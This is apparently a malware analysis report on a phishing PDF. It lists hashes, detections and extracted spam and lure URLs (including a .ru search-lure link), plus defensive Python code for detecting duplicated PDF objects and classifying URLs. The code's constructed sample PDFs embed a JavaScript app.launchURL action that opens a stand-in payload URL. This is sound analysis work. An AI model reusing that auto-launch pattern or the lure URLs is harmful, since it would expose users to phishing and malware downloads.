Malicious PDF — malware analysis report

Static analysis result for SHA-256 b7d7c14ae86b4b56…

MALICIOUS

PDF

Size: 83.5 KB
Created: 2021-03-15 17:12:59 +02:00
Authoring application: wkhtmltopdf 0.12.5 (via Qt 4.8.7)
MD5:     4eef4a2a8fca445cba83571361dc39d2
SHA-1:   7d448a314e7113a9787ec3466a9fc8add40bd197
SHA-256: b7d7c14ae86b4b56fd470baeee3ef23262ba9aae1beaeb4d05193ebb7fbfafbf
Risk score: 96

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.007 JavaScript

The PDF was flagged as malicious by both the ML classifier (score 0.9995) and ClamAV (Pdf.Phishing.Trojan), so a phishing or malware-distribution lure is the most likely purpose. The heavily obfuscated document body contains a URL whose utm_term is a search-query phrase about air fryers (https://crophysi.ru/strik?utm_term=can+you+use+cooking+oil+in+an+air+fryer), the shape of a search-engine lure; most of the other extracted URLs point to .pdf files with random-looking names on free-hosting subdomains and throwaway .space/.xyz/.site/.online domains, which is consistent with a bulk PDF spam campaign whose downloads may redirect to phishing content or malware. Not every extracted URL is a lead: the w3.org, purl.org and ns.adobe.com entries are XMP schema namespace identifiers, and ascendercorp.com, daltonmaag.com and scripts.sil.org/OFL are font-foundry and font-licence references of the kind carried in embedded font name tables; a PDF reader never fetches any of these. The producer string wkhtmltopdf 0.12.5 indicates the document was rendered from HTML, which fits a mass-generated lure, although producer metadata is trivially forgeable and should not be used on its own for attribution.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9995

Heuristics (4)

  • ClamAV: Pdf.Phishing.Trojan-d2568dad23a94d95-d2568dad23a94d95-10044375-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Phishing.Trojan-d2568dad23a94d95-d2568dad23a94d95-10044375-0
  • External URI info PDF_URI
    PDF contains an external URL action
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (object number N, generation G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content (an action, script or embedded file).
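    The check behind PDF_DUPLICATE_OBJ_BODY_INCREMENTAL, as an added example (not the analysis tool's own code): scan the raw bytes for every `N G obj ... endobj` definition, report object numbers defined more than once with differing bodies, and raise severity only when one of the duplicates carries active content. The sample PDF, its object numbers and the example.invalid hostname are constructed for the demonstration; the regex scanner does not honour stream /Length and will mis-split objects whose binary stream data happens to contain `endobj`, so a production check should walk streams properly.

```python
import re
from collections import defaultdict

# Constructed sample (not the analysed file). The first revision defines object 4 as a
# link annotation with an internal destination. The appended incremental update
# redefines 4 0 with a /JavaScript action: a first-wins reader shows a harmless
# link, a last-wins reader runs the script.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R] >> endobj
4 0 obj << /Type /Annot /Subtype /Link /Dest [3 0 R /Fit] >> endobj
xref
0 5
trailer << /Size 5 /Root 1 0 R >>
startxref
0
%%EOF
4 0 obj << /Type /Annot /Subtype /Link /A << /S /JavaScript /JS (app.launchURL('http://example.invalid/payload.pdf')) >> >> endobj
xref
0 1
trailer << /Size 5 /Root 1 0 R /Prev 0 >>
startxref
0
%%EOF
"""

# Same shape, but the update only adds a /Rect: a body-only difference with no
# active content, which is what a benign incremental save looks like.
BENIGN_UPDATE = SAMPLE_PDF.replace(
    b"/A << /S /JavaScript /JS (app.launchURL('http://example.invalid/payload.pdf')) >>",
    b"/Rect [0 0 100 20]",
)

# "N G obj <body> endobj"; the lookbehind stops "12 0 obj" from also matching "2 0 obj".
OBJ_RE = re.compile(rb"(?<![0-9])(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)

# PDF name keys that make an object "active": actions, scripts, embedded files.
# Matched as whole names so /JS does not also fire on /JSomething.
ACTIVE_RE = re.compile(
    rb"/(JavaScript|JS|Launch|OpenAction|AA|URI|SubmitForm|GoToR|EmbeddedFile|RichMedia)(?![A-Za-z0-9])"
)


def find_objects(data: bytes) -> dict:
    """Map (num, gen) -> list of body bytes, in file order (first revision first)."""
    objs = defaultdict(list)
    for m in OBJ_RE.finditer(data):
        objs[(int(m.group(1)), int(m.group(2)))].append(m.group(3).strip())
    return dict(objs)


def duplicate_objects(data: bytes) -> dict:
    """Objects defined more than once with at least two distinct bodies."""
    return {k: v for k, v in find_objects(data).items() if len(set(v)) > 1}


def has_active_content(body: bytes) -> bool:
    return ACTIVE_RE.search(body) is not None


def assess(data: bytes) -> list:
    """One finding per duplicated object; 'high' only if a duplicate body is active."""
    findings = []
    for (num, gen), bodies in duplicate_objects(data).items():
        first_active = has_active_content(bodies[0])   # what a first-wins reader resolves
        last_active = has_active_content(bodies[-1])   # what a last-wins reader resolves
        findings.append({
            "obj": f"{num} {gen}",
            "definitions": len(bodies),
            "first_active": first_active,
            "last_active": last_active,
            "severity": "high" if (first_active or last_active) else "info",
        })
    return findings


if __name__ == "__main__":
    for name, blob in (("malicious update", SAMPLE_PDF), ("benign update", BENIGN_UPDATE)):
        print(name, assess(blob))
```

    The first-wins/last-wins split is the point of the finding: a gateway scanner that resolves objects one way can be shown content that the end user's reader never sees, so the triage decision should consider both resolutions rather than whichever one the scanner's parser happens to pick.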
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • https://crophysi.ru/strik?utm_term=can+you+use+cooking+oil+in+an+air+fryer
    • http://nitapida.mywebcommunity.org/criminology_the_core_5th_edition.pdf
    • http://hellochildren.online/coursera_machine_learning_andrew_ng_quiz_answersc6ct2.pdf
    • http://gnatural.space/biminaoyjnk.pdf
    • http://yognat.space/41179785523obyea.pdf
    • http://naturalm.space/apologetica_evangelica1hjq3.pdf
    • https://cdn-cms.f-static.net/uploads/4386836/normal_6043b4bd28834.pdf
    • http://jewlgems.com/81981885835lgugo.pdf
    • http://kprovk.xyz/septic_tank_inspection_report_formy047q.pdf
    • http://xijulefabogi.getenjoyment.net/do_weight_watchers_scales_need_batteries.pdf
    • https://static.s123-cdn-static.com/uploads/4420230/normal_5fe3beaacab38.pdf
    • http://onkoprofi.ru/87983381117g3gbh.pdf
    • http://rusakadovub.sportsontheweb.net/genupesifunetibozukinap.pdf
    • http://usblighter24.site/how_many_calories_in_a_wendys_baconator_without_the_bun6hlz3.pdf
    • http://www.ascendercorp.com/
    • http://www.ascendercorp.com/typedesigners.html
    • http://www.daltonmaag.com/
    • https://uploads.strikinglycdn.com/files/3ba443ad-3d3b-41be-babf-f35719eafe28/what_machines_does_planet_fitness_use.pdf
    • https://uploads.strikinglycdn.com/files/2483075a-eaff-4a94-9b00-205f1310e750/12487824812.pdf
    • https://uploads.strikinglycdn.com/files/9054c636-ef03-423f-805f-4cfc4e54dac7/dasozopexikediserotojexa.pdf
    • https://6d8b2927-5c4d-40df-b593-c6bd35e19528.filesusr.com/ugd/1adac8_806c566a26014fab89914b9185d57902.pdf?index=true
    • https://c31d65df-273c-4bcc-acfb-7b03b0724b99.filesusr.com/ugd/e7e4a0_6fdb3136c2c5405e9c21e25a7b41493c.pdf?index=true
    • https://uploads.strikinglycdn.com/files/c5db1f0d-4da5-432e-9522-b931bfff4112/the_boy_in_the_striped_pajamas_movie_free.pdf
    • https://a98f38e8-5810-4fc9-be6a-c3d78c7c4f9f.filesusr.com/ugd/921909_e140344ff96d46bb9852426e119b97d1.pdf?index=true
    • https://ef733714-782c-48ea-8991-1bc0bf0c95f2.filesusr.com/ugd/ad2ade_4e9df33a4ee940759cf7d7a68ff178da.pdf?index=true
    • https://42e65457-ec34-4553-8979-78b6e302f774.filesusr.com/ugd/f1976d_7ac96f934fdc41639e5dc6d83a4a68b0.pdf?index=true
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://purl.org/dc/elements/1.1/
    • http://ns.adobe.com/pdf/1.3/
    • http://ns.adobe.com/xap/1.0/
    • http://ns.adobe.com/xap/1.0/mm/
    • http://ns.adobe.com/xap/1.0/rights/
    • http://scripts.sil.org/OFL
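    The per-URL channel labelling that the EMBEDDED_URL and PDF_URI heuristics describe, as an added example (not the analysis tool's own code): walk each indirect object, decide which channel it represents (URI link action, JavaScript, XMP metadata stream, page content stream), collect every URL it contains, and then sort the result into actionable URLs (reached by a click or a script), passive body text, and XML namespace or licence identifiers that a reader never fetches. The sample PDF is constructed for the demonstration and its .invalid hostnames stand in for the domains in the report; the channel detection is a substring heuristic on raw object bytes and does not decompress Flate-encoded streams, which a real extractor must do.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample (not the analysed file): one URI link annotation, one OpenAction
# JavaScript that launches a URL, an XMP metadata stream carrying namespace URIs, and
# a page content stream whose visible text contains a URL.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /Metadata 6 0 R /OpenAction 5 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R] /Contents 7 0 R >> endobj
4 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI (https://crophysi.invalid/strik?utm_term=air+fryer) >> >> endobj
5 0 obj << /S /JavaScript /JS (app.launchURL("http://gnatural.invalid/payload.pdf", true);) >> endobj
6 0 obj << /Type /Metadata /Subtype /XML /Length 0 >>
stream
<x:xmpmeta xmlns:x="adobe:ns:meta/"><rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:pdf="http://ns.adobe.com/pdf/1.3/"/></x:xmpmeta>
endstream
endobj
7 0 obj << /Length 0 >>
stream
BT /F1 12 Tf 72 700 Td (Download: http://kprovk.invalid/report.pdf) Tj ET
endstream
endobj
trailer << /Root 1 0 R >>
"""

OBJ_RE = re.compile(rb"(?<![0-9])(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)
URL_RE = re.compile(rb"""https?://[^\s()<>"']+""")

# Hosts that appear in PDFs as XML namespace or font-licence identifiers only
# (XMP schemas, SIL Open Font License). A reader never fetches them.
METADATA_HOSTS = {"www.w3.org", "purl.org", "ns.adobe.com", "scripts.sil.org"}


def channel_of(body: bytes) -> str:
    """Classify an object by the channel through which a URL inside it is reached."""
    if re.search(rb"/Type\s*/Metadata", body):
        return "xmp_metadata"
    if re.search(rb"/S\s*/URI", body):                     # URI action (PDF_URI)
        return "link_annotation"
    if re.search(rb"/(JS|JavaScript)(?![A-Za-z])", body):   # script action
        return "javascript"
    if b"stream" in body:                                    # page content / other stream
        return "document_body"
    return "other"


def extract_urls(data: bytes) -> dict:
    """Map each URL (str) to the set of channels it was found in."""
    found = defaultdict(set)
    for m in OBJ_RE.finditer(data):
        body = m.group(3)
        ch = channel_of(body)
        for raw in URL_RE.findall(body):
            found[raw.decode("latin-1")].add(ch)
    return dict(found)


def label(url: str, channels: set) -> str:
    if "javascript" in channels or "link_annotation" in channels:
        return "actionable"        # a click or script fetches it without further user effort
    host = (urlsplit(url).hostname or "").lower()
    if host in METADATA_HOSTS:
        return "schema-namespace"  # identifier only, never fetched; drop from the lead list
    return "passive-text"          # visible text; the user has to copy it themselves


def triage(data: bytes) -> list:
    """Per-URL rows sorted by URL: url, channels, label."""
    rows = [{"url": u, "channels": sorted(c), "label": label(u, c)}
            for u, c in extract_urls(data).items()]
    return sorted(rows, key=lambda r: r["url"])


if __name__ == "__main__":
    for row in triage(SAMPLE_PDF):
        print(f"{row['label']:16} {','.join(row['channels']):16} {row['url']}")
```

    Applied to the list above, this separates the handful of URLs a victim can actually be sent to (the crophysi.ru lure and the .pdf downloads) from the w3.org, purl.org, ns.adobe.com and scripts.sil.org identifiers, which belong in the report but not in a blocklist.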

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename: font_00_sfnt_off0000f8d9.bin
  SHA-256: 7a4ce3a6b19ea4ee3c516534e0ed3e5bb56f1447d1d03e954c63255b50724a88
  Kind:    pdf-font-stream
  Source:  PDF embedded font (sfnt) at offset 0xF8D9
  Size:    5040 bytes

Filename: font_01_sfnt_off00010a18.bin
  SHA-256: 800b503533494bee3bd16489a0e5cb95d03099fd5d4ff500acf026f9b0efb94e
  Kind:    pdf-font-stream
  Source:  PDF embedded font (sfnt) at offset 0x10A18
  Size:    11740 bytes

Filename: font_02_sfnt_off000131aa.bin
  SHA-256: ce7e2e230a41ba6fc2d7d2240890c8289d67876d84a3d076d67c0b48111c8230
  Kind:    pdf-font-stream
  Source:  PDF embedded font (sfnt) at offset 0x131AA
  Size:    4324 bytes